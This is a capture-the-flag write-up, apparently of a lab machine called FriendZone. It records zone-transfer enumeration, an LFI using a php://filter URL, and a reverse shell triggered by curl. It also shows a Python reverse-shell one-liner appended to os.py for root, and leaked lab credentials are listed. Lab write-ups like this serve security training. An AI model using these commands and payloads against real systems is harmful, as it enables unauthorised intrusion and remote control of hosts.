NETWORK

ENUMERATION

Shares

We can list the shares without a valid user

We have found a set of credentials

admin/WORKWORKHhallelujah@#

Port 80

DNS Enumeration

We are able to list some subdomains using the following dig command

dig axfr @10.10.10.123 friendzone.red +nostat +nocomments +nocmd

We can achieve the same discoveries with the following command

host -l friendzone.red 10.10.10.123

FOOTHOLD

Enumeration

Using our credentials found earlier we get

Looking into the administrator1 subdomain we have found the admin zone

We can list the folder of images

A scan as revealed a file timestamp

in relation to the following information

LFI

Using the following url

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard

we are able to get the page dashboard in base64

Low access as www-data

We were not able to go after any other important file so instead we went on to put a reverse shell on the share \\10.10.10.123\Development

As indicated by smbmap we can see that the files are loaded from /etc/

Our script is accessible

we get a low access as ‘www-data’on the server using the following url with curl

curl -k https://administrator1.friendzone.red/dashboard.php\?image_id\=a.jpg\&pagename\=/etc/Development/reverse\&ip\=10.10.16.9\&port\=4444 --cookie "FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1; sid=1b6be174-0b4c-11ed-af94-e5e2bf62d09e"

PRIV ESCALATION

Low access from www-data to friend

Agpyu12!0.213$

Root access

using https://github.com/DominicBreuker/pspy Running pspy64 we have found an interesting script running on the server

./pspy64

Running the following command on the server

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.9",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> /usr/lib/python2.7/os.py

allow us to get a reverse shell